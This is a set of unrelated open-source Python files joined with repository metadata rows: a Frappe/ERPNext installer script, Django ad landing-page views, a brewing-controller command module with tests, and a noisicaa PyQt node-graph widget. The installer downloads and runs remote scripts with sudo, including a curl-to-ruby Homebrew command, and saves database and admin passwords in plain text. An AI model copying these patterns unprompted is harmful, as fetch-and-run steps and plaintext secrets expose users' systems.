if not success:
print 'Could not install pre-requisites. Please check for errors or install them manually.'
return
# secure pip installation
if find_executable('pip'):
run_os_command({
'yum': 'sudo pip install --upgrade setuptools pip',
'apt-get': 'sudo pip install --upgrade setuptools pip',
'brew': "sudo pip install --upgrade setuptools pip --user"
})
else:
if not os.path.exists("get-pip.py"):
run_os_command({
'apt-get': 'wget https://bootstrap.pypa.io/get-pip.py',
'yum': 'wget https://bootstrap.pypa.io/get-pip.py'
})
success = run_os_command({
'apt-get': 'sudo python get-pip.py',
'yum': 'sudo python get-pip.py',
})
if success:
run_os_command({
'pip': 'sudo pip install --upgrade pip setuptools',
})
# Restricting ansible version due to following bug in ansible 2.1
# https://github.com/ansible/ansible-modules-core/issues/3752
success = run_os_command({
'pip': "sudo pip install 'ansible==2.0.2.0'"
})
if not success:
could_not_install('Ansible')
# clone bench repo
if not args.run_travis:
clone_bench_repo(args)
if not args.user:
if args.production:
args.user = 'frappe'
elif os.environ.has_key('SUDO_USER'):
args.user = os.environ['SUDO_USER']
else:
args.user = getpass.getuser()
if args.user == 'root':
raise Exception('Please run this script as a non-root user with sudo privileges, but without using sudo or pass --user=USER')
# create user if not exists
extra_vars = vars(args)
extra_vars.update(frappe_user=args.user)
if os.path.exists(tmp_bench_repo):
repo_path = tmp_bench_repo
else:
repo_path = os.path.join(os.path.expanduser('~'), 'bench')
extra_vars.update(repo_path=repo_path)
run_playbook('develop/create_user.yml', extra_vars=extra_vars)
extra_vars.update(get_passwords(args.run_travis or args.without_bench_setup))
if args.production:
extra_vars.update(max_worker_connections=multiprocessing.cpu_count() * 1024)
branch = 'master' if args.production else 'master'
extra_vars.update(branch=branch)
if args.develop:
run_playbook('develop/install.yml', sudo=True, extra_vars=extra_vars)
elif args.production:
run_playbook('production/install.yml', sudo=True, extra_vars=extra_vars)
if os.path.exists(tmp_bench_repo):
shutil.rmtree(tmp_bench_repo)
def check_distribution_compatibility():
supported_dists = {'ubuntu': [14, 15, 16], 'debian': [7, 8],
'centos': [7], 'macos': [10.9, 10.10, 10.11, 10.12]}
dist_name, dist_version = get_distribution_info()
if dist_name in supported_dists:
if float(dist_version) in supported_dists[dist_name]:
return
print "Sorry, the installer doesn't support {0} {1}. Aborting installation!".format(dist_name, dist_version)
if dist_name in supported_dists:
print "Install on {0} {1} instead".format(dist_name, supported_dists[dist_name][-1])
sys.exit(1)
def get_distribution_info():
# return distribution name and major version
if platform.system() == "Linux":
current_dist = platform.dist()
return current_dist[0].lower(), current_dist[1].rsplit('.')[0]
elif platform.system() == "Darwin":
current_dist = platform.mac_ver()
return "macos", current_dist[0].rsplit('.', 1)[0]
def install_python27():
version = (sys.version_info[0], sys.version_info[1])
if version == (2, 7):
return
print 'Installing Python 2.7'
# install python 2.7
success = run_os_command({
'apt-get': 'sudo apt-get install -y python2.7',
'yum': 'sudo yum install -y python27',
'brew': 'brew install python'
})
if not success:
could_not_install('Python 2.7')
# replace current python with python2.7
os.execvp('python2.7', ([] if is_sudo_user() else ['sudo']) + ['python2.7', __file__] + sys.argv[1:])
def install_package(package):
package_exec = find_executable(package)
if not package_exec:
success = run_os_command({
'apt-get': ['sudo apt-get install -y {0}'.format(package)],
'yum': ['sudo yum install -y {0}'.format(package)]
})
else:
return
if not success:
could_not_install(package)
def check_brew_installed():
if 'Darwin' not in os.uname():
return
brew_exec = find_executable('brew')
if not brew_exec:
raise Exception('''
Please install brew package manager before proceeding with bench setup. Please run following
to install brew package manager on your machine,
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
''')
def clone_bench_repo(args):
'''Clones the bench repository in the user folder'''
if os.path.exists(tmp_bench_repo):
return 0
elif args.without_bench_setup:
clone_path = os.path.join(os.path.expanduser('~'), 'bench')
else:
clone_path = tmp_bench_repo
branch = args.bench_branch or 'master'
repo_url = args.repo_url or 'https://github.com/bailabs/bench-v7.git'
success = run_os_command(
{'git': 'git clone {repo_url} {bench_repo} --depth 1 --branch {branch}'.format(
repo_url=repo_url, bench_repo=clone_path, branch=branch)}
)
return success
def run_os_command(command_map):
'''command_map is a dictionary of {'executable': command}. For ex. {'apt-get': 'sudo apt-get install -y python2.7'} '''
success = True
for executable, commands in command_map.items():
if find_executable(executable):
if isinstance(commands, basestring):
commands = [commands]
for command in commands:
returncode = subprocess.check_call(command, shell=True)
success = success and ( returncode == 0 )
break
return success
def could_not_install(package):
raise Exception('Could not install {0}. Please install it manually.'.format(package))
def is_sudo_user():
return os.geteuid() == 0
def get_passwords(ignore_prompt=False):
if not ignore_prompt:
mysql_root_password, admin_password = '', ''
pass_set = True
while pass_set:
# mysql root password
if not mysql_root_password:
mysql_root_password = getpass.unix_getpass(prompt='Please enter mysql root password: ')
conf_mysql_passwd = getpass.unix_getpass(prompt='Re-enter mysql root password: ')
if mysql_root_password != conf_mysql_passwd:
mysql_root_password = ''
continue
# admin password
if not admin_password:
admin_password = getpass.unix_getpass(prompt='Please enter the default Administrator user password: ')
conf_admin_passswd = getpass.unix_getpass(prompt='Re-enter Administrator password: ')
if admin_password != conf_admin_passswd:
admin_password = ''
continue
pass_set = False
else:
mysql_root_password = admin_password = 'travis'
passwords = {
'mysql_root_password': mysql_root_password,
'admin_password': admin_password
}
if not ignore_prompt:
passwords_file_path = os.path.join(os.path.expanduser('~'), 'passwords.txt')
with open(passwords_file_path, 'w') as f:
json.dump(passwords, f, indent=1)
print 'Passwords saved at ~/passwords.txt'
return passwords
def get_extra_vars_json(extra_args):
# We need to pass production as extra_vars to the playbook to execute conditionals in the
# playbook. Extra variables can passed as json or key=value pair. Here, we will use JSON.
json_path = os.path.join('/tmp', 'extra_vars.json')
extra_vars = dict(extra_args.items())
with open(json_path, mode='w') as j:
json.dump(extra_vars, j, indent=1, sort_keys=True)
return ('@' + json_path)
def run_playbook(playbook_name, sudo=False, extra_vars=None):
args = ['ansible-playbook', '-c', 'local', playbook_name]
if extra_vars:
args.extend(['-e', get_extra_vars_json(extra_vars)])
if extra_vars.get('verbosity'):
args.append('-vvvv')
if sudo:
user = extra_vars.get('user') or getpass.getuser()
args.extend(['--become', '--become-user={0}'.format(user)])
if os.path.exists(tmp_bench_repo):
cwd = tmp_bench_repo
else:
cwd = os.path.join(os.path.expanduser('~'), 'bench')
success = subprocess.check_call(args, cwd=os.path.join(cwd, 'playbooks'))
return success
def parse_commandline_args():
import argparse
parser = argparse.ArgumentParser(description='Frappe Installer')
# Arguments develop and production are mutually exclusive both can't be specified together.
# Hence, we need to create a group for discouraging use of both options at the same time.
args_group = parser.add_mutually_exclusive_group()
args_group.add_argument('--develop', dest='develop', action='store_true', default=False,
help='Install developer setup')
args_group.add_argument('--production', dest='production', action='store_true',
default=False, help='Setup Production environment for bench')
parser.add_argument('--site', dest='site', action='store', default='site1.local',
help='Specifiy name for your first ERPNext site')
parser.add_argument('--verbose', dest='verbosity', action='store_true', default=False,
help='Run the script in verbose mode')
parser.add_argument('--user', dest='user', help='Install frappe-v7 for this user')
parser.add_argument('--bench-branch', dest='bench_branch', help='Clone a particular branch of bench repository')
parser.add_argument('--repo-url', dest='repo_url', help='Clone bench from the given url')
# To enable testing of script using Travis, this should skip the prompt
parser.add_argument('--run-travis', dest='run_travis', action='store_true', default=False,
help=argparse.SUPPRESS)
parser.add_argument('--without-bench-setup', dest='without_bench_setup', action='store_true', default=False,
help=argparse.SUPPRESS)
args = parser.parse_args()
return args
if __name__ == '__main__':
try:
import argparse
except ImportError:
# install python2.7
install_python27()
args = parse_commandline_args()
install_bench(args)
print '''Frappe/ERPNext has been successfully installed!'''
| gpl-3.0 | -1,744,825,575,128,492,300 | 29.249292 | 127 | 0.699569 | false |
diN0bot/ProcrasDonate | adwords/views/main.py | 1 | 2790 | import settings
from lib.view_utils import render_response, render_string, HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import user_passes_test
from adwords.models import *
def adword_page(request, group):
page = "landing"
return render_response(request, 'adwords/landing_pages/%s.html' % group, locals())
def adword_click(request, page, group):
return render_response(request, 'adwords/click_to_page_base.html', locals())
def adword_done(request, page, group):
return render_response(request, 'adwords/done_page.html', locals())
def adword_email_form(request, page, group):
if request.POST:
email = request.POST.get('email', None)
if email:
email = email.strip()
visitor = Visitor.add(group, page, email)
try:
# send email for recipient user to reset password
txt = render_string(request, 'adwords/email.txt', {'email': email,
'settings': settings,
'visitor': visitor,
'group': group,
'page': page})
visitor.send_email("Welcome to ProcrasDonate",
txt,
from_email=settings.EMAIL)
return HttpResponseRedirect(reverse('adword_done', args=(page, group)))
except:
Log.Error("Adword visitor::Problem sending thank you email to %s for %s \
(maybe email address does not exist?)" % (email, visitor), "adword")
return HttpResponseRedirect(reverse('adword_done', args=(page, group)))
@user_passes_test(lambda u: u.is_superuser)
def dashboard(request):
# table = rows of groups, with columns the total no. of emails registered per page
table = []
click_tos = Visitor.objects.all().values_list('email_page', flat=True).order_by().distinct()
# construct header row
header_row = ["Landing Page", "Total"]
for click_to in click_tos:
header_row.append(click_to)
table.append(header_row)
# construct rest of rows
groups = Visitor.objects.all().values_list('page_group', flat=True).order_by().distinct()
for group in groups:
row = [group, Visitor.objects.filter(page_group=group).count()]
for click_to in click_tos:
row.append(Visitor.objects.filter(email_page=click_to, page_group=group).count())
table.append(row)
return render_response(request, 'adwords/dashboard.html', locals())
| agpl-3.0 | 758,947,347,224,055,200 | 40.641791 | 96 | 0.574194 | false |
dennerlager/sepibrews | sepibrews/command.py | 1 | 2978 | import sys
import unittest
class Command():
"""Use factory method 'create(command_name)' to instantiate"""
def __init__(self, arguments, executionEngine):
self.arguments = arguments
self.executionEngine = executionEngine
def execute(self):
raise NotImplementedError()
class StartCommand(Command):
def execute(self):
self.executionEngine.execute()
class StopCommand(Command):
def execute(self):
self.executionEngine.stopExecution()
class QuitCommand(Command):
def execute(self):
self.executionEngine.stopExecution()
sys.exit()
class GetPvCommand(Command):
def execute(self):
return self.executionEngine.getTemperature()
class GetSvCommand(Command):
def execute(self):
return self.executionEngine.getSetValue()
class GetRemainingStepTimeCommand(Command):
def execute(self):
return self.executionEngine.getRemainingStepTime()
class GetTotalRemainingTimeCommand(Command):
def execute(self):
return self.executionEngine.getTotalRemainingTime()
class SetRecipeCommand(Command):
def execute(self):
return self.executionEngine.setRecipe(self.arguments[0])
commands = {'start': StartCommand,
'stop': StopCommand,
'quit': QuitCommand,
'getPv': GetPvCommand,
'getSv': GetSvCommand,
'getRemainingStepTime': GetRemainingStepTimeCommand,
'getTotalRemainingTime': GetTotalRemainingTimeCommand,
'setRecipe': SetRecipeCommand, }
def create(command_name, arguments, executionEngine):
try:
return commands[command_name](arguments, executionEngine)
except KeyError:
raise ValueError("no such command: {}".format(command_name))
class CommandCreationTest(unittest.TestCase):
def test_instantiate_raises(self):
self.assertRaises(ValueError, create, 'asdf', [], 'ee')
def test_startCommand(self):
self.assertIsInstance(create('start', [], 'ee'), StartCommand)
def test_stopCommand(self):
self.assertIsInstance(create('stop', [], 'ee'), StopCommand)
def test_quitCommand(self):
self.assertIsInstance(create('quit', [], 'ee'), QuitCommand)
def test_getPvCommand(self):
self.assertIsInstance(create('getPv', [], 'ee'), GetPvCommand)
def test_getSvCommand(self):
self.assertIsInstance(create('getSv', [], 'ee'), GetSvCommand)
def test_getRemainingStepTimeCommand(self):
self.assertIsInstance(create('getRemainingStepTime', [], 'ee'),
GetRemainingStepTimeCommand)
def test_getTotalRemainingTimeCommand(self):
self.assertIsInstance(create('getTotalRemainingTime', [], 'ee'),
GetTotalRemainingTimeCommand)
def test_setRecipe(self):
self.assertIsInstance(create('setRecipe', ['./recipes/test.csv'], 'ee'), SetRecipeCommand)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -4,192,804,074,547,650,600 | 31.021505 | 98 | 0.671927 | false |
odahoda/noisicaa | noisicaa/ui/graph/base_node.py | 1 | 34059 | #!/usr/bin/python3
# @begin:license
#
# Copyright (c) 2015-2019, Benjamin Niemann <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @end:license
import functools
import logging
import os.path
from typing import cast, Any, Optional, Dict, List, Iterable
from PyQt5.QtCore import Qt
from PyQt5 import QtCore
from PyQt5 import QtGui
from PyQt5 import QtSvg
from PyQt5 import QtWidgets
from noisicaa import constants
from noisicaa import audioproc
from noisicaa import core
from noisicaa import value_types
from noisicaa import music
from noisicaa import node_db
from noisicaa.ui import ui_base
from noisicaa.ui import mute_button
logger = logging.getLogger(__name__)
port_colors = {
node_db.PortDescription.UNDEFINED: QtGui.QColor(150, 150, 150),
node_db.PortDescription.AUDIO: QtGui.QColor(100, 255, 100),
node_db.PortDescription.ARATE_CONTROL: QtGui.QColor(100, 255, 180),
node_db.PortDescription.KRATE_CONTROL: QtGui.QColor(100, 180, 255),
node_db.PortDescription.EVENTS: QtGui.QColor(255, 180, 100),
}
class SelectColorAction(QtWidgets.QWidgetAction):
colorSelected = QtCore.pyqtSignal(value_types.Color)
def __init__(self, parent: QtCore.QObject) -> None:
super().__init__(parent)
self.setDefaultWidget(SelectColorWidget(parent=parent, action=self))
class ColorBox(QtWidgets.QWidget):
clicked = QtCore.pyqtSignal()
def __init__(self, color: value_types.Color, parent: QtWidgets.QWidget) -> None:
super().__init__(parent)
self.__color = color
self.setFixedSize(24, 24)
def paintEvent(self, event: QtGui.QPaintEvent) -> None:
super().paintEvent(event)
painter = QtGui.QPainter(self)
try:
painter.fillRect(self.rect(), Qt.black)
painter.fillRect(self.rect().adjusted(1, 1, -1, -1), Qt.white)
painter.fillRect(self.rect().adjusted(2, 2, -2, -2), QtGui.QColor.fromRgbF(
self.__color.r,
self.__color.g,
self.__color.b,
self.__color.a))
finally:
painter.end()
def mousePressEvent(self, event: QtGui.QMouseEvent) -> None:
if event.button() == Qt.LeftButton:
self.clicked.emit()
class SelectColorWidget(QtWidgets.QWidget):
colors = [
value_types.Color(0.7, 0.7, 0.7),
value_types.Color(0.8, 0.8, 0.8),
value_types.Color(0.9, 0.9, 0.9),
value_types.Color(1.0, 1.0, 1.0),
value_types.Color(1.0, 0.6, 0.6),
value_types.Color(1.0, 0.7, 0.7),
value_types.Color(1.0, 0.8, 0.8),
value_types.Color(1.0, 0.9, 0.9),
value_types.Color(1.0, 0.6, 0.1),
value_types.Color(1.0, 0.7, 0.3),
value_types.Color(1.0, 0.8, 0.6),
value_types.Color(1.0, 0.9, 0.8),
value_types.Color(0.6, 1.0, 0.6),
value_types.Color(0.7, 1.0, 0.7),
value_types.Color(0.8, 1.0, 0.8),
value_types.Color(0.9, 1.0, 0.9),
value_types.Color(0.6, 0.6, 1.0),
value_types.Color(0.7, 0.7, 1.0),
value_types.Color(0.8, 0.8, 1.0),
value_types.Color(0.9, 0.9, 1.0),
value_types.Color(1.0, 0.6, 1.0),
value_types.Color(1.0, 0.7, 1.0),
value_types.Color(1.0, 0.8, 1.0),
value_types.Color(1.0, 0.9, 1.0),
value_types.Color(1.0, 1.0, 0.6),
value_types.Color(1.0, 1.0, 0.7),
value_types.Color(1.0, 1.0, 0.8),
value_types.Color(1.0, 1.0, 0.9),
value_types.Color(0.6, 1.0, 1.0),
value_types.Color(0.7, 1.0, 1.0),
value_types.Color(0.8, 1.0, 1.0),
value_types.Color(0.9, 1.0, 1.0),
]
def __init__(self, *, action: SelectColorAction, **kwargs: Any) -> None:
super().__init__(**kwargs)
self.__action = action
layout = QtWidgets.QGridLayout()
layout.setContentsMargins(QtCore.QMargins(2, 2, 2, 2))
layout.setSpacing(2)
self.setLayout(layout)
for idx, color in enumerate(self.colors):
w = ColorBox(color, self)
w.clicked.connect(functools.partial(self.__action.colorSelected.emit, color))
layout.addWidget(w, idx // 8, idx % 8)
class NodeProps(QtCore.QObject):
contentRectChanged = QtCore.pyqtSignal(QtCore.QRectF)
canvasLayoutChanged = QtCore.pyqtSignal()
class Title(QtWidgets.QGraphicsSimpleTextItem):
def __init__(self, name: str, parent: 'Node') -> None:
super().__init__(parent)
self.setText(name)
self.setFlag(QtWidgets.QGraphicsItem.ItemClipsToShape, True)
self.setAcceptedMouseButtons(Qt.LeftButton)
self.__width = None # type: float
def boundingRect(self) -> QtCore.QRectF:
bounding_rect = super().boundingRect()
if self.__width is not None:
bounding_rect.setWidth(self.__width)
return bounding_rect
def shape(self) -> QtGui.QPainterPath:
shape = QtGui.QPainterPath()
shape.addRect(self.boundingRect())
return shape
def setWidth(self, width: float) -> None:
self.__width = width
class Box(QtWidgets.QGraphicsPathItem):
def mousePressEvent(self, event: QtWidgets.QGraphicsSceneMouseEvent) -> None:
# swallow mouse press events (which aren't handled by some other of the
# node's items) to prevent the canvas from triggering a rubber band
# selection.
event.accept()
class NodeIcon(QtWidgets.QGraphicsItem):
def __init__(self, icon: QtSvg.QSvgRenderer, parent: QtWidgets.QGraphicsItem) -> None:
super().__init__(parent)
self.__icon = icon
self.__size = QtCore.QSizeF()
self.__pixmap = None # type: QtGui.QPixmap
def setRect(self, rect: QtCore.QRectF) -> None:
self.prepareGeometryChange()
self.setPos(rect.topLeft())
self.__size = rect.size()
def boundingRect(self) -> QtCore.QRectF:
return QtCore.QRectF(QtCore.QPointF(), self.__size)
def paint(
self, painter: QtGui.QPainter, option: QtWidgets.QStyleOptionGraphicsItem,
widget: Optional[QtWidgets.QWidget] = None) -> None:
size = min(self.__size.width(), self.__size.height())
size = int(size - 0.4 * max(0, size - 50))
if size < 10:
return
pixmap_size = QtCore.QSize(size, size)
if self.__pixmap is None or self.__pixmap.size() != pixmap_size:
self.__pixmap = QtGui.QPixmap(pixmap_size)
self.__pixmap.fill(QtGui.QColor(0, 0, 0, 0))
pixmap_painter = QtGui.QPainter(self.__pixmap)
try:
self.__icon.render(pixmap_painter, QtCore.QRectF(0, 0, size, size))
finally:
pixmap_painter.end()
painter.setOpacity(min(0.8, max(0.2, 0.8 - (size - 30) / 100)))
painter.drawPixmap(
int((self.__size.width() - size) / 2),
int((self.__size.height() - size) / 2),
self.__pixmap)
class PortLabel(QtWidgets.QGraphicsRectItem):
def __init__(self, port: 'Port') -> None:
super().__init__()
self.setZValue(100000)
self.__text = QtWidgets.QGraphicsSimpleTextItem(self)
tooltip = '%s: ' % port.name()
tooltip += '/'.join(
{
node_db.PortDescription.AUDIO: "audio",
node_db.PortDescription.KRATE_CONTROL: "k-rate control",
node_db.PortDescription.ARATE_CONTROL: "a-rate control",
node_db.PortDescription.EVENTS: "event",
}[port_type]
for port_type in port.possible_types())
tooltip += {
node_db.PortDescription.INPUT: " input",
node_db.PortDescription.OUTPUT: " output",
}[port.direction()]
self.__text.setText(tooltip)
self.__text.setPos(4, 2)
text_box = self.__text.boundingRect()
pen = QtGui.QPen()
pen.setColor(Qt.black)
pen.setWidth(1)
self.setPen(pen)
self.setBrush(QtGui.QColor(255, 255, 200))
self.setRect(0, 0, text_box.width() + 8, text_box.height() + 4)
class Port(QtWidgets.QGraphicsPathItem):
def __init__(self, port_desc: node_db.PortDescription, parent: 'Node') -> None:
super().__init__(parent)
self.__desc = port_desc
self.__node = parent.node()
self.__listeners = core.ListenerList()
self.__listeners.add(
self.__node.connections_changed.add(lambda _: self.__update()))
self.__target_type = None # type: node_db.PortDescription.Type
self.__highlighted = False
self.__tooltip = None # type: PortLabel
def setup(self) -> None:
self.__tooltip = PortLabel(self)
self.scene().addItem(self.__tooltip)
self.__update()
def cleanup(self) -> None:
if self.__tooltip is not None:
self.scene().removeItem(self.__tooltip)
self.__tooltip = None
self.__listeners.cleanup()
def name(self) -> str:
return self.__desc.name
def direction(self) -> node_db.PortDescription.Direction:
return self.__desc.direction
def current_type(self) -> node_db.PortDescription.Type:
return self.__node.get_current_port_type(self.__desc.name)
def possible_types(self) -> List['node_db.PortDescription.Type']:
return self.__node.get_possible_port_types(self.__desc.name)
def node(self) -> 'Node':
return cast(Node, self.parentItem())
def highlighted(self) -> bool:
return self.__highlighted
def setHighlighted(self, highlighted: bool) -> None:
self.__highlighted = highlighted
self.__update()
def setTargetType(self, target_type: node_db.PortDescription.Type) -> None:
if self.__target_type == target_type:
return
self.__target_type = target_type
self.__update()
def clearTargetType(self) -> None:
if self.__target_type is None:
return
self.__target_type = None
self.__update()
def canConnectTo(self, port: 'Port') -> bool:
return music.can_connect_ports(
self.__node, self.__desc.name,
port.__node, port.__desc.name)
def preferredConnectionType(self, port: 'Port') -> node_db.PortDescription.Type:
return music.get_preferred_connection_type(
self.__node, self.__desc.name,
port.__node, port.__desc.name)
def handleScenePos(self) -> QtCore.QPointF:
if not self.isVisible():
return self.scenePos()
elif self.__desc.direction == node_db.PortDescription.INPUT:
return self.scenePos() + QtCore.QPointF(-10, 0)
else:
return self.scenePos() + QtCore.QPointF(10, 0)
def descriptionChanged(self, port_desc: node_db.PortDescription) -> None:
self.__desc = port_desc
self.__update()
def __update(self) -> None:
color = port_colors[self.__target_type or self.current_type()]
if self.__highlighted:
self.setOpacity(1.0)
self.__tooltip.setVisible(self.__highlighted)
ttpos = self.scenePos()
ttpos += QtCore.QPointF(0, -self.__tooltip.boundingRect().height() / 2)
if self.__desc.direction == node_db.PortDescription.OUTPUT:
ttpos += QtCore.QPointF(20, 0)
else:
ttpos -= QtCore.QPointF(20 + self.__tooltip.boundingRect().width(), 0)
self.__tooltip.setPos(ttpos)
else:
self.setOpacity(0.7)
self.__tooltip.setVisible(False)
if self.__highlighted or self.__target_type is not None:
pen = QtGui.QPen()
pen.setColor(Qt.red)
pen.setWidth(2)
self.setPen(pen)
self.setBrush(color)
rect = QtCore.QRectF(-15, -12, 30, 24)
else:
pen = QtGui.QPen()
pen.setColor(QtGui.QColor(80, 80, 200))
pen.setWidth(1)
self.setPen(pen)
self.setBrush(color)
rect = QtCore.QRectF(-10, -8, 20, 16)
path = QtGui.QPainterPath()
if self.__desc.direction == node_db.PortDescription.INPUT:
path.moveTo(0, rect.top())
path.arcTo(rect, 90, 180)
else:
path.moveTo(0, rect.top())
path.arcTo(rect, 90, -180)
self.setPath(path)
class Node(ui_base.ProjectMixin, core.AutoCleanupMixin, QtWidgets.QGraphicsItem):
__next_zvalue = 2.0
has_window = False
def __init__(
self, *,
node: music.BaseNode,
icon: Optional[QtSvg.QSvgRenderer] = None,
**kwargs: Any
) -> None:
super().__init__(**kwargs)
self.setZValue(1.0)
self.setAcceptHoverEvents(True)
self.setAcceptedMouseButtons(Qt.LeftButton)
self.props = NodeProps()
self.__session_prefix = 'node/%016x/' % node.id
self.__listeners = core.ListenerList()
self.add_cleanup_function(self.__listeners.cleanup)
self.__node = node
self.__window = None # type: QtWidgets.QWidget
self.__box = Box(self)
if icon is not None:
self.__icon = NodeIcon(icon, self)
else:
self.__icon = None
self.__ports = {} # type: Dict[str, Port]
for port_desc in self.__node.description.ports:
port = Port(port_desc, self)
self.__ports[port_desc.name] = port
self.__title = Title(self.__node.name, self)
self.__title_edit = QtWidgets.QLineEdit()
self.__title_edit.editingFinished.connect(self.__renameNodeFinished)
self.__title_edit_proxy = QtWidgets.QGraphicsProxyWidget(self)
self.__title_edit_proxy.setWidget(self.__title_edit)
self.__title_widgets_proxy = None
self.__title_widgets_container = None
title_widgets = list(self.titleWidgets())
if title_widgets:
self.__title_widgets_container = QtWidgets.QWidget()
self.__title_widgets_container.setAutoFillBackground(False)
self.__title_widgets_container.setAttribute(Qt.WA_NoSystemBackground, True)
layout = QtWidgets.QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
layout.setSpacing(1)
for widget in title_widgets:
layout.addWidget(widget)
self.__title_widgets_container.setLayout(layout)
self.__title_widgets_proxy = QtWidgets.QGraphicsProxyWidget(self)
self.__title_widgets_proxy.setWidget(self.__title_widgets_container)
self.__body_proxy = None # type: QtWidgets.QGraphicsProxyWidget
self.__body = self.createBodyWidget()
if self.__body is not None:
self.__body.setAutoFillBackground(False)
self.__body.setAttribute(Qt.WA_NoSystemBackground, True)
self.__body_proxy = QtWidgets.QGraphicsProxyWidget(self)
self.__body_proxy.setWidget(self.__body)
self.__transform = QtGui.QTransform()
self.__canvas_rect = self.__transform.mapRect(self.contentRect())
self.__selected = False
self.__hovered = False
self.__rename_node = False
self.__drag_rect = QtCore.QRectF()
self.__listeners.add(
self.__node.name_changed.add(self.__nameChanged))
self.__listeners.add(
self.__node.graph_pos_changed.add(self.__graphRectChanged))
self.__listeners.add(
self.__node.graph_size_changed.add(self.__graphRectChanged))
self.__listeners.add(
self.__node.graph_color_changed.add(lambda *_: self.__updateState()))
self.__listeners.add(
self.__node.port_properties_changed.add(lambda *_: self.__layout()))
self.__listeners.add(
self.__node.description_changed.add(lambda *_: self.__descriptionChanged()))
self.__state = None # type: audioproc.NodeStateChange.State
self.__listeners.add(
self.audioproc_client.node_state_changed.add(
'%08x' % self.__node.id, self.__stateChanged))
self.__updateState()
def __str__(self) -> str:
return '<node name=%r> ' % self.__node.name
@property
def __in_ports(self) -> List[node_db.PortDescription]:
return [
port_desc for port_desc in self.__node.description.ports
if port_desc.direction == node_db.PortDescription.INPUT
]
@property
def __out_ports(self) -> List[node_db.PortDescription]:
return [
port_desc for port_desc in self.__node.description.ports
if port_desc.direction == node_db.PortDescription.OUTPUT
]
def __nameChanged(self, *args: Any) -> None:
self.__title.setText(self.__node.name)
def __graphRectChanged(self, *args: Any) -> None:
self.__canvas_rect = self.__transform.mapRect(self.contentRect())
self.__layout()
self.props.contentRectChanged.emit(self.contentRect())
def createBodyWidget(self) -> QtWidgets.QWidget:
return None
def createWindow(self, **kwargs: Any) -> QtWidgets.QWidget:
raise RuntimeError("Node %s does not support windows." % type(self).__name__)
def titleWidgets(self) -> Iterable[QtWidgets.QWidget]:
if self.__node.description.node_ui.muteable:
muted_button = mute_button.MuteButton()
muted_button.toggled.connect(
lambda muted: self.project_client.set_session_value(
self.__session_prefix + 'muted', muted))
muted_button.setChecked(
self.project_client.get_session_value(
self.__session_prefix + 'muted', False))
self.project_client.add_session_data_listener(
self.__session_prefix + 'muted', muted_button.setChecked)
yield muted_button
if self.__node.removable:
remove_button = QtWidgets.QToolButton()
remove_button.setAutoRaise(True)
remove_button.setIcon(QtGui.QIcon(
os.path.join(constants.DATA_DIR, 'icons', 'window-close.svg')))
remove_button.clicked.connect(self.onRemove)
yield remove_button
def setup(self) -> None:
for port in self.__ports.values():
port.setup()
def cleanup(self) -> None:
for port in self.__ports.values():
port.cleanup()
self.__ports.clear()
if self.__window is not None:
self.__window.close()
self.__window = None
super().cleanup()
def node(self) -> music.BaseNode:
return self.__node
def id(self) -> int:
return self.__node.id
def name(self) -> str:
return self.__node.name
def graph_pos(self) -> value_types.Pos2F:
return self.__node.graph_pos
def graph_size(self) -> value_types.SizeF:
return self.__node.graph_size
def ports(self) -> Iterable[Port]:
for port_desc in self.__node.description.ports:
yield self.__ports[port_desc.name]
def upstream_nodes(self) -> List[music.BaseNode]:
return self.__node.upstream_nodes()
def selected(self) -> bool:
return self.__selected
def setSelected(self, selected: bool) -> None:
self.__selected = selected
self.__updateState()
def port(self, port_name: str) -> Port:
return self.__ports[port_name]
def portHandleScenePos(self, port_name: str) -> QtCore.QPointF:
return self.__ports[port_name].handleScenePos()
def contentTopLeft(self) -> QtCore.QPointF:
return QtCore.QPointF(self.__node.graph_pos.x, self.__node.graph_pos.y)
def contentSize(self) -> QtCore.QSizeF:
return QtCore.QSizeF(self.__node.graph_size.width, self.__node.graph_size.height)
def contentRect(self) -> QtCore.QRectF:
return QtCore.QRectF(self.contentTopLeft(), self.contentSize())
def canvasTopLeft(self) -> QtCore.QPointF:
return self.__canvas_rect.topLeft()
def setCanvasTopLeft(self, pos: QtCore.QPointF) -> None:
self.__canvas_rect.moveTopLeft(pos)
self.__layout()
def setCanvasRect(self, rect: QtCore.QRectF) -> None:
self.__canvas_rect = rect
self.__layout()
def canvasRect(self) -> QtCore.QRectF:
return self.__canvas_rect
def setCanvasTransform(self, transform: QtGui.QTransform) -> None:
self.__transform = transform
self.__canvas_rect = self.__transform.mapRect(self.contentRect())
self.__layout()
def resizeSide(self, pos: QtCore.QPointF) -> Optional[str]:
t = self.__canvas_rect.top()
b = self.__canvas_rect.bottom()
l = self.__canvas_rect.left()
r = self.__canvas_rect.right()
w = self.__canvas_rect.width()
h = self.__canvas_rect.height()
resize_rects = {
'top': QtCore.QRectF(l + 4, t, w - 8, 4),
'bottom': QtCore.QRectF(l + 10, b - 10, w - 20, 10),
'left': QtCore.QRectF(l, t + 4, 4, h - 14),
'right': QtCore.QRectF(r - 4, t + 4, 4, h - 14),
'topleft': QtCore.QRectF(l, t, 4, 4),
'topright': QtCore.QRectF(r - 4, t, 4, 4),
'bottomleft': QtCore.QRectF(l, b - 10, 10, 10),
'bottomright': QtCore.QRectF(r - 10, b - 10, 10, 10),
}
for side, rect in resize_rects.items():
if rect.contains(pos):
return side
return None
def dragRect(self) -> QtCore.QRectF:
return self.__drag_rect
def boundingRect(self) -> QtCore.QRectF:
return self.__box.boundingRect()
def __descriptionChanged(self) -> None:
ports = {}
for port_desc in self.__node.description.ports:
if port_desc.name not in self.__ports:
port = Port(port_desc, self)
port.setup()
else:
port = self.__ports[port_desc.name]
port.descriptionChanged(port_desc)
ports[port_desc.name] = port
for port_name, port in self.__ports.items():
if port_name not in ports:
port.cleanup()
port.setParentItem(None)
self.scene().removeItem(port)
self.__ports = ports
self.__layout()
